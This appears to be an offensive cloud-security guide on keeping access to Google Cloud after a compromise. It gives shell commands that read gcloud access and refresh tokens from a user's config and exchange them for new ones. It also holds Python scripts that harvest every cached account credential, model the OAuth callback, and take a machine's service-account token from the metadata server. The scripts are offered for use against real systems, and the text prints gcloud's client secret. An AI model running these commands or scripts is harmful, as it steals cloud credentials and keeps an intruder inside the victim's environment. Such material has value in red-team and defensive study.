GCP - Non-svc Persistence

These are useful techniques once you have, in some way, obtained GCP credentials or a foothold on a machine running inside a GCP environment.

Token Hijacking

Authenticated User Tokens

To get the current access token of a user you can run:

sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"

Check on this page how to use this token directly with gcloud.

To get the details needed to generate a new access token, run:

sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"

It is also possible to find refresh tokens in $HOME/.config/gcloud/application_default_credentials.json and in $HOME/.config/gcloud/legacy_credentials/*/adc.json.

To obtain a new access token using the refresh token, client ID and client secret, use:

curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token

The lifetime of refresh tokens can be controlled in the Workspace Admin console under Admin > Security > Google Cloud session control; by default it is set to 16h, although it can be configured to never expire.
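The three sources above (access_tokens.db, credentials.db and the ADC json files) can be harvested in one pass and turned into the refresh-token grant shown in the curl command. The script below is an added example, not gcloud's code nor part of the original page: the sqlite column names it relies on are the ones the queries above use, the rest of the table layout and the sample store it builds are constructed, and every secret in it is a fake placeholder.

```python
#!/usr/bin/env python3
"""Harvest gcloud user credentials from ~/.config/gcloud and build the
refresh-token grant.  Added example, not gcloud's or the page's code."""
import glob
import json
import os
import sqlite3
import tempfile
import urllib.parse
import urllib.request

# Current token endpoint; the page's oauth2/v4/token URL accepts the same body.
TOKEN_URL = "https://oauth2.googleapis.com/token"
SCOPES = ("https://www.googleapis.com/auth/cloud-platform "
          "https://www.googleapis.com/auth/accounts.reauth")


def _rows(db_path, query):
    if not os.path.exists(db_path):
        return []
    con = sqlite3.connect(db_path)
    try:
        return list(con.execute(query))
    finally:
        con.close()


def harvest_gcloud(config_dir):
    """Collect tokens and refresh material per account from the sqlite stores
    and the ADC json files.  Column names follow the sqlite3 queries above;
    the rest of the schema is an assumption."""
    found = {}
    for acct, tok in _rows(os.path.join(config_dir, "access_tokens.db"),
                           "SELECT account_id, access_token FROM access_tokens"):
        found.setdefault(acct, {})["access_token"] = tok
    for acct, value in _rows(os.path.join(config_dir, "credentials.db"),
                             "SELECT account_id, value FROM credentials"):
        found.setdefault(acct, {}).update(json.loads(value))
    adc_files = [os.path.join(config_dir, "application_default_credentials.json")]
    adc_files += glob.glob(os.path.join(config_dir, "legacy_credentials", "*", "adc.json"))
    for path in adc_files:
        if os.path.exists(path):
            with open(path) as fh:
                # keyed by file so a second refresh token for the same user is not lost
                found["adc:" + os.path.relpath(path, config_dir)] = json.load(fh)
    return found


def build_refresh_request(cred, scope=SCOPES):
    """Form body of the refresh_token grant, the same fields as the curl above."""
    if cred.get("type", "authorized_user") != "authorized_user":
        raise ValueError("not a user credential: %s" % cred.get("type"))
    return {"client_id": cred["client_id"], "client_secret": cred["client_secret"],
            "grant_type": "refresh_token", "refresh_token": cred["refresh_token"],
            "scope": scope}


def refresh_access_token(cred):
    """Perform the grant (needs network; returns Google's JSON reply)."""
    body = urllib.parse.urlencode(build_refresh_request(cred)).encode()
    req = urllib.request.Request(TOKEN_URL, data=body, headers={
        "Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=20) as resp:
        return json.load(resp)


def make_sample_store(config_dir):
    """Constructed stand-in for ~/.config/gcloud; every secret here is fake."""
    con = sqlite3.connect(os.path.join(config_dir, "access_tokens.db"))
    con.execute("CREATE TABLE access_tokens (account_id TEXT PRIMARY KEY, access_token TEXT,"
                " token_expiry TIMESTAMP, rapt_token TEXT, id_token TEXT)")
    con.execute("INSERT INTO access_tokens VALUES (?,?,?,?,?)",
                ("victim@example.com", "ya29.FAKE_ACCESS", "2099-01-01 00:00:00", None, None))
    con.commit(); con.close()
    con = sqlite3.connect(os.path.join(config_dir, "credentials.db"))
    con.execute("CREATE TABLE credentials (account_id TEXT PRIMARY KEY, value BLOB)")
    con.execute("INSERT INTO credentials VALUES (?,?)", ("victim@example.com", json.dumps({
        "client_id": "32555940559.apps.googleusercontent.com",
        "client_secret": "FAKE_SECRET", "refresh_token": "1//FAKE_REFRESH",
        "type": "authorized_user"})))
    con.commit(); con.close()
    legacy = os.path.join(config_dir, "legacy_credentials", "victim@example.com")
    os.makedirs(legacy)
    with open(os.path.join(legacy, "adc.json"), "w") as fh:
        json.dump({"type": "authorized_user", "client_id": "x", "client_secret": "y",
                   "refresh_token": "1//FAKE_LEGACY"}, fh)


def demo_on_sample():
    """Build the fake store in a temp dir and harvest it (offline)."""
    d = tempfile.mkdtemp()
    make_sample_store(d)
    return harvest_gcloud(d)


if __name__ == "__main__":
    import sys
    cfg = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~/.config/gcloud")
    for acct, cred in harvest_gcloud(cfg).items():
        print(acct, json.dumps(cred, indent=2))
```

Run it against a real ~/.config/gcloud to list every account with its cached access token and refresh material; refresh_access_token() then performs the same grant as the curl command. Service-account entries in credentials.db carry type "service_account" and a private key instead of a refresh token, which is why build_refresh_request() refuses them.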

Auth flow

The authentication flow used by something like gcloud auth login opens a prompt in the browser and, after all the scopes are accepted, the browser sends a request like this one to the HTTP port opened by the tool:

/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1

Then gcloud uses the state and code together with the client_id (32555940559.apps.googleusercontent.com) and client_secret (ZmssLNjJy2998hD4CTg2ejr2) to obtain the final refresh token data.

Note that the communication with localhost happens over plain HTTP, so it would be possible to sniff that request and obtain the authorization code. However, the code is valid only once and, as the code_challenge parameter in the authorization URL shows, the exchange also requires the PKCE code_verifier that only the gcloud process holds, so this is not useful: it is simpler to just read the refresh token from the files.
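To make the localhost leg of the flow concrete, the following added example (not gcloud's code or the original page's) parses the callback request line shown above, checks the state value, and builds the PKCE verifier/challenge pair together with the code-for-token exchange body. It uses the client ID from the page; the redirect port and the RFC 7636 test vector in the comments are assumptions for illustration.

```python
#!/usr/bin/env python3
"""Model of the gcloud auth login callback: parse the request the browser
sends to the local listener and build the PKCE material the token exchange
needs.  Added example, not gcloud's implementation."""
import base64
import hashlib
import secrets
import urllib.parse

GCLOUD_CLIENT_ID = "32555940559.apps.googleusercontent.com"  # from the page
AUTH_URL = "https://accounts.google.com/o/oauth2/auth"


def s256_challenge(verifier):
    """RFC 7636 S256: base64url(sha256(verifier)) without padding."""
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


def pkce_pair():
    """Random verifier (43..128 chars) and its challenge; the verifier never
    leaves the client process, only the challenge goes into the auth URL."""
    verifier = secrets.token_urlsafe(64)[:96]
    return verifier, s256_challenge(verifier)


def build_auth_url(scopes, state, challenge, port=8085):
    """Authorization URL in the shape gcloud uses (see the scope-probing script)."""
    params = {
        "response_type": "code",
        "client_id": GCLOUD_CLIENT_ID,
        "redirect_uri": "http://localhost:%d/" % port,   # assumed port
        "scope": " ".join(scopes),
        "state": state,
        "access_type": "offline",
        "code_challenge": challenge,
        "code_challenge_method": "S256",
    }
    return AUTH_URL + "?" + urllib.parse.urlencode(params)


def parse_callback(request_line):
    """Extract state, code and granted scopes from the GET hitting localhost.
    Accepts either a full request line or just the request target."""
    target = next(t for t in request_line.split() if t.startswith("/"))
    q = urllib.parse.parse_qs(urllib.parse.urlparse(target).query)
    return {
        "state": q["state"][0],
        "code": q["code"][0],
        "scopes": q.get("scope", [""])[0].split(),
    }


def exchange_body(callback, expected_state, verifier, client_secret, port=8085):
    """Body of the code-for-token POST.  A captured code alone is not enough:
    the server checks code_verifier against the challenge and the code is
    single-use, so a sniffer on the loopback request gains nothing."""
    if callback["state"] != expected_state:
        raise ValueError("state mismatch: possible injected callback")
    return {
        "grant_type": "authorization_code",
        "code": callback["code"],
        "client_id": GCLOUD_CLIENT_ID,
        "client_secret": client_secret,
        "redirect_uri": "http://localhost:%d/" % port,
        "code_verifier": verifier,
    }


# The request line captured on the page, trimmed to a few scopes (sample input).
SAMPLE_CALLBACK = (
    "GET /?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO"
    "&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A"
    "&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email"
    "%20https://www.googleapis.com/auth/cloud-platform&authuser=0&prompt=consent HTTP/1.1")

if __name__ == "__main__":
    verifier, challenge = pkce_pair()
    print(build_auth_url(["openid", "https://www.googleapis.com/auth/cloud-platform"],
                         "EN5AK1GxwrEKgKog9ANBm0qDwWByYO", challenge))
    cb = parse_callback(SAMPLE_CALLBACK)
    print(exchange_body(cb, "EN5AK1GxwrEKgKog9ANBm0qDwWByYO", verifier, "<client_secret>"))
```

The state check is what a tool should do on the listener side; an attacker who can reach the loopback port can otherwise inject their own code into the flow. The challenge/verifier logic is the standard RFC 7636 construction and can be checked against the RFC's own vector ("dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk" maps to "E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM").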

OAuth Scopes

You can find all the Google scopes at https://developers.google.com/identity/protocols/oauth2/scopes or obtain them by running:

curl -s "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\-\._]*' | sort -u

It is possible to check which scopes the application gcloud uses to authenticate can support with this script (it requests each scope from the authorization endpoint and prints the ones that do not produce an error page):

curl -s "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
    echo -ne "Testing $scope         \r"
    # the authorization endpoint answers with an error page when the client does not support the scope
    if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
        echo ""
        echo "$scope"
    fi
done

After running it, this application was found to support the following scopes:

https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
https://www.googleapis.com/auth/cloud-platform
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email

It is interesting that this application supports the drive scope, which could allow a user to escalate from GCP to Workspace if an attacker manages to get the user to generate a token with this scope.

Check how to abuse it here.

Service Accounts

As with authenticated users, if you manage to compromise the private key file of a service account you will usually be able to access it for as long as you want. However, stealing the OAuth token of a service account can be even more interesting because, although by default these tokens are only useful for one hour, if the victim deletes the private API key the OAuth token will still remain valid until it expires.

Metadata

Obviously, as long as you are inside a machine running in the GCP environment you will be able to access the service account attached to that machine by querying the metadata endpoint (note that the OAuth tokens you can obtain from this endpoint are usually restricted by scopes).
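The following added example (not from the page) pulls the attached service account's token from the GCE metadata server and records the absolute time at which it stops working, which is the window described in the Service Accounts section above: the token keeps working until then even after the key is deleted. The metadata paths and the Metadata-Flavor header are the documented GCE ones; the sample responses are constructed so the parsing can be checked offline.

```python
#!/usr/bin/env python3
"""Steal the default service account token from the GCE metadata server and
track its expiry.  Added example; sample responses below are constructed."""
import json
import time
import urllib.request

METADATA = "http://metadata.google.internal/computeMetadata/v1"


def metadata_request(path):
    """The server rejects requests lacking the Metadata-Flavor: Google header."""
    return urllib.request.Request(METADATA + path, headers={"Metadata-Flavor": "Google"})


def fetch(path):
    with urllib.request.urlopen(metadata_request(path), timeout=5) as resp:
        return resp.read().decode()


def parse_token(body, now=None):
    """Turn the /token JSON into a ready Authorization header plus an absolute
    expiry; rotating or deleting the SA key does not shorten that window."""
    data = json.loads(body)
    now = time.time() if now is None else now
    token_type = data.get("token_type", "Bearer")
    return {
        "access_token": data["access_token"],
        "expires_at": now + int(data["expires_in"]),
        "authorization": "%s %s" % (token_type, data["access_token"]),
    }


def parse_scopes(body):
    """/scopes returns one OAuth scope per line; these bound what the token can do."""
    return [s.strip() for s in body.splitlines() if s.strip()]


def steal_default_sa():
    """Live collection (network): identity, scopes and token of the attached SA."""
    sa = "/instance/service-accounts/default"
    return {
        "email": fetch(sa + "/email").strip(),
        "scopes": parse_scopes(fetch(sa + "/scopes")),
        "token": parse_token(fetch(sa + "/token")),
    }


# Constructed sample responses (shape of the real endpoints, fake values).
SAMPLE_TOKEN = '{"access_token":"ya29.c.FAKE","expires_in":3599,"token_type":"Bearer"}'
SAMPLE_SCOPES = ("https://www.googleapis.com/auth/devstorage.read_only\n"
                 "https://www.googleapis.com/auth/logging.write\n")

if __name__ == "__main__":
    loot = steal_default_sa()
    print(loot["email"], loot["scopes"])
    print("usable for another %d s" % (loot["token"]["expires_at"] - time.time()))
```

If the scopes list is narrower than cloud-platform, the token is limited to those APIs regardless of the service account's IAM roles, which is the restriction the paragraph above refers to.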

Remediations

Some remediations for these techniques are explained in https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2
